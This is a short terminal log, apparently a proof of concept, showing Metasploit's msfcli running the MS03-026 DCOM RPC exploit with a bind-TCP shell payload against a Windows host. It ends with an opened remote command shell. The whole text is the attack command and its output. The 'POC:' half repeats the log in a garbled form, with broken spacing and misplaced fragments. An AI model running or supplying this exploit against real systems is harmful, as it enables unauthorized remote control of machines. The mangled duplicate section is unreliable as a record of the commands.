root@sslinuxvm12:/pentest/exploits/framework3# ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=10.211.55.5 E
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.211.55.5[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.211.55.5[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.211.55.3:39156 -> 10.211.55.5:4444)
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
POC:
root@sslinuxvm1 2:/pentest/ exploits/ framework3# ./msfcli exploit/ windows/ dcerpc/ ms03_026_ dcom PAYLOAD= windows/ shell/bind_ tcp RHOST=10.211.55.5 E 7d1c-11cf- 861e-0020af6e7c 57:0.0@ ncacn_ip_ tcp:10. 211.55. 5[135] ... 7d1c-11cf- 861e-0020af6e7c 57:0.0@ ncacn_ip_ tcp:10. 211.55. 5[135] ...
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-
[*] Bound to 4d9f4ab8-
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.211.55.3:39156 -> 10.211.55.5:4444)
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\ system32>